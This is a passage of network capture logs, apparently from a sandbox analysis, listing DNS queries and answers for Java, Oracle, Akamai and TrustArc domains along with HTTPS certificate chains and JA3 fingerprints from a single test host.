May 6, 2021 17:58:12.159320116 CEST	56132	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:12.219074965 CEST	53	56132	8.8.8.8	192.168.2.3
May 6, 2021 17:58:12.328233004 CEST	58987	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:12.346910954 CEST	56579	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:12.388268948 CEST	53	58987	8.8.8.8	192.168.2.3
May 6, 2021 17:58:12.408998013 CEST	53	56579	8.8.8.8	192.168.2.3
May 6, 2021 17:58:12.564884901 CEST	60633	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:12.580631018 CEST	61292	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:12.642427921 CEST	53	60633	8.8.8.8	192.168.2.3
May 6, 2021 17:58:12.678725004 CEST	53	61292	8.8.8.8	192.168.2.3
May 6, 2021 17:58:12.835416079 CEST	63619	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:12.884105921 CEST	53	63619	8.8.8.8	192.168.2.3
May 6, 2021 17:58:13.653453112 CEST	64938	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:13.703809977 CEST	53	64938	8.8.8.8	192.168.2.3
May 6, 2021 17:58:14.563802004 CEST	61946	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:14.612484932 CEST	53	61946	8.8.8.8	192.168.2.3
May 6, 2021 17:58:15.642014027 CEST	64910	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:15.690665960 CEST	53	64910	8.8.8.8	192.168.2.3
May 6, 2021 17:58:21.188018084 CEST	52123	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:21.248085022 CEST	53	52123	8.8.8.8	192.168.2.3
May 6, 2021 17:58:22.497500896 CEST	56130	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:22.548291922 CEST	53	56130	8.8.8.8	192.168.2.3
May 6, 2021 17:58:26.829482079 CEST	56338	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:26.933499098 CEST	53	56338	8.8.8.8	192.168.2.3
May 6, 2021 17:58:37.037045956 CEST	59420	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:37.087759018 CEST	53	59420	8.8.8.8	192.168.2.3
May 6, 2021 17:58:37.645107031 CEST	58784	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:37.702646017 CEST	53	58784	8.8.8.8	192.168.2.3
May 6, 2021 17:58:38.046595097 CEST	59420	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:38.095331907 CEST	53	59420	8.8.8.8	192.168.2.3
May 6, 2021 17:58:38.648335934 CEST	58784	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:38.699323893 CEST	53	58784	8.8.8.8	192.168.2.3
May 6, 2021 17:58:39.038667917 CEST	59420	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:39.087491989 CEST	53	59420	8.8.8.8	192.168.2.3
May 6, 2021 17:58:39.647644043 CEST	58784	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:39.696650982 CEST	53	58784	8.8.8.8	192.168.2.3
May 6, 2021 17:58:41.068387985 CEST	59420	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:41.117151976 CEST	53	59420	8.8.8.8	192.168.2.3
May 6, 2021 17:58:41.656424999 CEST	58784	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:41.706859112 CEST	53	58784	8.8.8.8	192.168.2.3
May 6, 2021 17:58:45.062608004 CEST	59420	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:45.112226009 CEST	53	59420	8.8.8.8	192.168.2.3
May 6, 2021 17:58:45.656541109 CEST	58784	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:45.706598997 CEST	53	58784	8.8.8.8	192.168.2.3
May 6, 2021 17:58:49.920969963 CEST	63978	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:49.988905907 CEST	53	63978	8.8.8.8	192.168.2.3
May 6, 2021 17:59:12.562299967 CEST	62938	53	192.168.2.3	8.8.8.8
May 6, 2021 17:59:12.627789021 CEST	53	62938	8.8.8.8	192.168.2.3
May 6, 2021 17:59:19.803831100 CEST	55708	53	192.168.2.3	8.8.8.8
May 6, 2021 17:59:19.862463951 CEST	53	55708	8.8.8.8	192.168.2.3
May 6, 2021 17:59:51.403914928 CEST	56803	53	192.168.2.3	8.8.8.8
May 6, 2021 17:59:51.478326082 CEST	53	56803	8.8.8.8	192.168.2.3
May 6, 2021 17:59:56.092036963 CEST	57145	53	192.168.2.3	8.8.8.8
May 6, 2021 17:59:56.151798010 CEST	53	57145	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 6, 2021 17:58:06.867396116 CEST	192.168.2.3	8.8.8.8	0x98b2	Standard query (0)	www.java.com	A (IP address)	IN (0x0001)
May 6, 2021 17:58:08.093818903 CEST	192.168.2.3	8.8.8.8	0x59fb	Standard query (0)	www.java.com	A (IP address)	IN (0x0001)
May 6, 2021 17:58:08.608974934 CEST	192.168.2.3	8.8.8.8	0xb32d	Standard query (0)	static.oracle.com	A (IP address)	IN (0x0001)
May 6, 2021 17:58:08.988668919 CEST	192.168.2.3	8.8.8.8	0xb9dd	Standard query (0)	s.go-mpulse.net	A (IP address)	IN (0x0001)
May 6, 2021 17:58:09.437083006 CEST	192.168.2.3	8.8.8.8	0x7edc	Standard query (0)	c.go-mpulse.net	A (IP address)	IN (0x0001)
May 6, 2021 17:58:09.888776064 CEST	192.168.2.3	8.8.8.8	0xcf7a	Standard query (0)	c.oracleinfinity.io	A (IP address)	IN (0x0001)
May 6, 2021 17:58:10.436538935 CEST	192.168.2.3	8.8.8.8	0xce38	Standard query (0)	consent.trustarc.com	A (IP address)	IN (0x0001)
May 6, 2021 17:58:10.650891066 CEST	192.168.2.3	8.8.8.8	0x37cc	Standard query (0)	dc.oracleinfinity.io	A (IP address)	IN (0x0001)
May 6, 2021 17:58:10.661113024 CEST	192.168.2.3	8.8.8.8	0xaa13	Standard query (0)	www.oracle.com	A (IP address)	IN (0x0001)
May 6, 2021 17:58:10.954509974 CEST	192.168.2.3	8.8.8.8	0x665c	Standard query (0)	consent-pref.trustarc.com	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.274234056 CEST	192.168.2.3	8.8.8.8	0xd4ce	Standard query (0)	consent-st.trustarc.com	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.522727966 CEST	192.168.2.3	8.8.8.8	0xf4ad	Standard query (0)	docs.cyberservices.biz	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.579546928 CEST	192.168.2.3	8.8.8.8	0x3eb2	Standard query (0)	oracle.112.2o7.net	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.787964106 CEST	192.168.2.3	8.8.8.8	0x90e4	Standard query (0)	prefmgr-cookie.truste-svc.net	A (IP address)	IN (0x0001)
May 6, 2021 17:58:12.159320116 CEST	192.168.2.3	8.8.8.8	0x8b34	Standard query (0)	685d5b19.akstat.io	A (IP address)	IN (0x0001)
May 6, 2021 17:58:12.328233004 CEST	192.168.2.3	8.8.8.8	0x2bc8	Standard query (0)	trial-eum-clientnsv4-s.akamaihd.net	A (IP address)	IN (0x0001)
May 6, 2021 17:58:12.346910954 CEST	192.168.2.3	8.8.8.8	0x879a	Standard query (0)	trial-eum-clienttons-s.akamaihd.net	A (IP address)	IN (0x0001)
May 6, 2021 17:58:12.564884901 CEST	192.168.2.3	8.8.8.8	0xc179	Standard query (0)	84-17-52-78_s-23-32-238-155_ts-1620316692-clienttons-s.akamaihd.net	A (IP address)	IN (0x0001)
May 6, 2021 17:58:12.580631018 CEST	192.168.2.3	8.8.8.8	0x2061	Standard query (0)	kqitits7mulnqyeucika-p323bx-53d3b3fe1-clientnsv4-s.akamaihd.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 6, 2021 17:58:06.930119991 CEST	8.8.8.8	192.168.2.3	0x98b2	No error (0)	www.java.com	ds-www.java.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
May 6, 2021 17:58:08.155834913 CEST	8.8.8.8	192.168.2.3	0x59fb	No error (0)	www.java.com	ds-www.java.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
May 6, 2021 17:58:08.675712109 CEST	8.8.8.8	192.168.2.3	0xb32d	No error (0)	static.oracle.com	ds-oracle-microsites.edgekey.net		CNAME (Canonical name)	IN (0x0001)
May 6, 2021 17:58:09.048226118 CEST	8.8.8.8	192.168.2.3	0xb9dd	No error (0)	s.go-mpulse.net	ip46.go-mpulse.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
May 6, 2021 17:58:09.500181913 CEST	8.8.8.8	192.168.2.3	0x7edc	No error (0)	c.go-mpulse.net	wildcard46.go-mpulse.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
May 6, 2021 17:58:09.947135925 CEST	8.8.8.8	192.168.2.3	0xcf7a	No error (0)	c.oracleinfinity.io	c.oracleinfinity.io.edgekey.net		CNAME (Canonical name)	IN (0x0001)
May 6, 2021 17:58:10.498418093 CEST	8.8.8.8	192.168.2.3	0xce38	No error (0)	consent.trustarc.com		143.204.209.41	A (IP address)	IN (0x0001)
May 6, 2021 17:58:10.498418093 CEST	8.8.8.8	192.168.2.3	0xce38	No error (0)	consent.trustarc.com		143.204.209.4	A (IP address)	IN (0x0001)
May 6, 2021 17:58:10.498418093 CEST	8.8.8.8	192.168.2.3	0xce38	No error (0)	consent.trustarc.com		143.204.209.30	A (IP address)	IN (0x0001)
May 6, 2021 17:58:10.498418093 CEST	8.8.8.8	192.168.2.3	0xce38	No error (0)	consent.trustarc.com		143.204.209.71	A (IP address)	IN (0x0001)
May 6, 2021 17:58:10.719474077 CEST	8.8.8.8	192.168.2.3	0xaa13	No error (0)	www.oracle.com	ds-www.oracle.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
May 6, 2021 17:58:10.731818914 CEST	8.8.8.8	192.168.2.3	0x37cc	No error (0)	dc.oracleinfinity.io	dc.oracleinfinity.io.akadns.net		CNAME (Canonical name)	IN (0x0001)
May 6, 2021 17:58:11.014482021 CEST	8.8.8.8	192.168.2.3	0x665c	No error (0)	consent-pref.trustarc.com		143.204.209.31	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.014482021 CEST	8.8.8.8	192.168.2.3	0x665c	No error (0)	consent-pref.trustarc.com		143.204.209.127	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.014482021 CEST	8.8.8.8	192.168.2.3	0x665c	No error (0)	consent-pref.trustarc.com		143.204.209.93	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.014482021 CEST	8.8.8.8	192.168.2.3	0x665c	No error (0)	consent-pref.trustarc.com		143.204.209.77	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.339565992 CEST	8.8.8.8	192.168.2.3	0xd4ce	No error (0)	consent-st.trustarc.com		143.204.209.88	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.339565992 CEST	8.8.8.8	192.168.2.3	0xd4ce	No error (0)	consent-st.trustarc.com		143.204.209.57	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.339565992 CEST	8.8.8.8	192.168.2.3	0xd4ce	No error (0)	consent-st.trustarc.com		143.204.209.112	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.339565992 CEST	8.8.8.8	192.168.2.3	0xd4ce	No error (0)	consent-st.trustarc.com		143.204.209.2	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.641833067 CEST	8.8.8.8	192.168.2.3	0x3eb2	No error (0)	oracle.112.2o7.net		35.181.18.61	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.641833067 CEST	8.8.8.8	192.168.2.3	0x3eb2	No error (0)	oracle.112.2o7.net		15.237.76.117	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.641833067 CEST	8.8.8.8	192.168.2.3	0x3eb2	No error (0)	oracle.112.2o7.net		15.237.136.106	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.727689028 CEST	8.8.8.8	192.168.2.3	0xf4ad	No error (0)	docs.cyberservices.biz		50.87.249.219	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.845249891 CEST	8.8.8.8	192.168.2.3	0x90e4	No error (0)	prefmgr-cookie.truste-svc.net		34.202.206.65	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.845249891 CEST	8.8.8.8	192.168.2.3	0x90e4	No error (0)	prefmgr-cookie.truste-svc.net		3.212.50.245	A (IP address)	IN (0x0001)
May 6, 2021 17:58:11.845249891 CEST	8.8.8.8	192.168.2.3	0x90e4	No error (0)	prefmgr-cookie.truste-svc.net		3.232.192.25	A (IP address)	IN (0x0001)
May 6, 2021 17:58:12.219074965 CEST	8.8.8.8	192.168.2.3	0x8b34	No error (0)	685d5b19.akstat.io	wildcard46.akstat.io.edgekey.net		CNAME (Canonical name)	IN (0x0001)
May 6, 2021 17:58:12.388268948 CEST	8.8.8.8	192.168.2.3	0x2bc8	No error (0)	trial-eum-clientnsv4-s.akamaihd.net	a248.b.akamai.net		CNAME (Canonical name)	IN (0x0001)
May 6, 2021 17:58:12.408998013 CEST	8.8.8.8	192.168.2.3	0x879a	No error (0)	trial-eum-clienttons-s.akamaihd.net	trial-eum.cname.clienttons.com		CNAME (Canonical name)	IN (0x0001)
May 6, 2021 17:58:12.408998013 CEST	8.8.8.8	192.168.2.3	0x879a	No error (0)	trial-eum.cname.clienttons.com	a1024.dscg.akamai.net		CNAME (Canonical name)	IN (0x0001)
May 6, 2021 17:58:12.642427921 CEST	8.8.8.8	192.168.2.3	0xc179	No error (0)	84-17-52-78_s-23-32-238-155_ts-1620316692-clienttons-s.akamaihd.net	84.17.52.78_s-23.32.238.155_ts-1620316692.cname.clienttons.com		CNAME (Canonical name)	IN (0x0001)
May 6, 2021 17:58:12.642427921 CEST	8.8.8.8	192.168.2.3	0xc179	No error (0)	84.17.52.78_s-23.32.238.155_ts-1620316692.cname.clienttons.com	a1024.dscg.akamai.net		CNAME (Canonical name)	IN (0x0001)
May 6, 2021 17:58:12.678725004 CEST	8.8.8.8	192.168.2.3	0x2061	No error (0)	kqitits7mulnqyeucika-p323bx-53d3b3fe1-clientnsv4-s.akamaihd.net	kqitits7mulnqyeucika-p323bx-53d3b3fe1.ipv4-only.cname.clienttons.com		CNAME (Canonical name)	IN (0x0001)
May 6, 2021 17:58:12.678725004 CEST	8.8.8.8	192.168.2.3	0x2061	No error (0)	kqitits7mulnqyeucika-p323bx-53d3b3fe1.ipv4-only.cname.clienttons.com	a248.b.akamai.net		CNAME (Canonical name)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
May 6, 2021 17:58:10.593436003 CEST	143.204.209.41	443	192.168.2.3	49722	CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Thu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 6, 2021 17:58:10.593487978 CEST	143.204.209.41	443	192.168.2.3	49723	CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Thu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 6, 2021 17:58:11.101504087 CEST	143.204.209.31	443	192.168.2.3	49729	CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Thu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 6, 2021 17:58:11.101572990 CEST	143.204.209.31	443	192.168.2.3	49728	CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Thu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 6, 2021 17:58:11.429073095 CEST	143.204.209.88	443	192.168.2.3	49732	CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Thu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 6, 2021 17:58:11.429822922 CEST	143.204.209.88	443	192.168.2.3	49731	CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Thu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
